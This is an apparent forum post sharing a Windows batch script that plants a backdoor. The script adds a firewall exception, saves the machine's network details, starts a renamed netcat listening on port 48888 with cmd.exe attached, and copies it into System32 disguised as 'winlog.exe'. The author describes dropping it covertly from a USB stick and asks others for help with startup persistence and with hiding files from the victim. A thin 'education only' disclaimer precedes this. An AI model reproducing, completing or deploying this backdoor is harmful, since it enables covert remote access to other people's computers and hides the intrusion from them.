Code: Select all
echo off
cls
netsh firewall add allowedprogram winlog.exe winlog ENABLE
ipconfig /all > data.txt
start winlog.exe -d -l -p 48888 -e cmd.exe
copy winlog.exe C:\WINDOWS\System32
exit
Legal stuff: This is for education / curiosity reasons ONLY. If you use it for illegal activities you are on your own and none else but you is responsible.
My mods are to actually get nc to run in the backround, and even bypass Windows firewall if run from an admin shell.
I also extract the PC data to connect to it at my leisure (the concept is simple: plug the usb memory stick, execute the file, unplug, leave) and copy it to system32 because regular users rarely ever touch this thing, and the renamed file looks totally legitimate there, along winlogon.exe which BTW is a Windows essential procedure and can't be terminated . Also, system32 is by default in the path command, along with the windows directory, do I can execute it from everywhere in the pc. You get where I am going?
What this misses is the simple fact that I have to make it run every time the user starts the pc. I know that the obvious choice is the startup folder, but it is located at the user's personal folder, hence the problem: Is there any scripting adept out there who can enlighten me with the proper %what-should-I-put-here% thing, so I can just do:
copy StartEveryTime.bat %whatever%\startup ?
Also, I need another command to change the folder settings to NOT show hidden files. That way he/she won't ever take notice .
For now I have to do both of the aforementioned actions manually. So today I ask the help from any mischievous script guru and enthusiast.